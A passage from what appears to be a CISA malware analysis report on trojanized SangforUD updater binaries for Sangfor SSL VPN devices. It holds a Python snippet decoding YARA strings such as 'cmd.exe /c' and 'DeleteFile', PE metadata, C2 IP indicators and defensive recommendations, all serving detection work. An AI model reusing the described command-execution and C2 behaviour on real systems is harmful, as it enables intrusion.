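    most odd-offset bytes are zero, 'ascii' if every byte is printable or NUL,
    otherwise 'binary' (shown as spaced hex)."""
    high = data[1::2]
    if len(data) >= 4 and sum(b == 0 for b in high) >= 0.6 * len(high):
        return "utf-16le", decode_wide(data)
    if all(_printable(b) or b == 0 for b in data):
        return "ascii", data.decode("ascii").replace("\x00", "|")
    return "binary", data.hex(" ")


def decode_rule_strings(rule_text):
    """Map each hex-string identifier to (kind, readable form)."""
    return {name: classify(raw) for name, raw in parse_hex_strings(rule_text).items()}


if __name__ == "__main__":
    for name, (kind, text) in decode_rule_strings(RULE_STRINGS).items():
        print(f"{name:<4} {kind:<9} {text}")
```

Seen this way, `$5` is the wide pair `Script|cmd.exe|/c`, `$8` the narrow pair `RandomString|DeleteFile`, `$24` a Go regular expression with the named groups `fn` and `arg`, and `$25` the wide string `\.SangforUD.sum`, which is useful context when deciding whether a hit on a condition branch such as `($24)` alone is specific enough for the environment the rule is deployed in.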
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-12 10:02:59-04:00
Import Hash a723dab3d5a36cc8ad0ef65a0d4cfb3d
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
ed096fa6a0d25049398750d840d02748 header 1024 3.038012
0f2de5a1546886f5cb9876d918d333bf .text 238080 6.593105
398a48e3a63f160340ba9720a3f13bc8 .rdata 73728 5.589507
6f25e38b602834c202db365468104061 .data 4608 3.709410
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
093889615fb3f28b9066f7dc93650099 .rsrc 103936 3.885922
d404cb13c9f033a5b71c2d31cf474e6f .reloc 12800 6.522532
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
a4b790ddff… Connected_To 192.168.169.103
Description

This file is a 32-bit Windows executable and is similar in design and structure to the file 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace the update binaries served out from Sangfor SSL VPN devices. It uses the private IP address 192.168.169.103 as a C2 server.

192.168.169.103

Whois

Queried whois.arin.net with "n 192.168.169.103"...
NetRange:     192.168.0.0 - 192.168.255.255
CIDR:         192.168.0.0/16
NetName:        PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED
NetHandle:     NET-192-168-0-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        IANA Special Use
Organization: Internet Assigned Numbers Authority (IANA)
RegDate:        1994-03-15
Updated:        2013-08-30
Comment:        These addresses are in use by many millions of independently operated networks, which might be as small as a single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They are only intended for use within a private context and traffic that needs to cross the Internet will need to use a different, unique address.
Comment:        These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry. The traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on logs or in e-mail records. Please refer to http://www.iana.org/abuse/answers
Comment:        These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best Current Practice document, RFC 1918 which can be found at:
Comment:        http://datatracker.ietf.org/doc/rfc1918
Ref:            https://rdap.arin.net/registry/ip/192.168.0.0
OrgName:        Internet Assigned Numbers Authority
OrgId:         IANA
Address:        12025 Waterfront Drive
Address:        Suite 300
City:         Los Angeles
StateProv:     CA
PostalCode:     90292
Country:        US
Updated:        2012-08-31
Ref:            https://rdap.arin.net/registry/entity/IANA

Relationships
192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
Description

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064 attempts to connect to the private IP address.

Relationship Summary

65495d173e… Connected_To 103.216.221.19
103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
58d8e65976… Connected_To 103.216.221.19
a4b790ddff… Connected_To 192.168.169.103
192.168.169.103 Connected_From a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up to date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • July 16, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.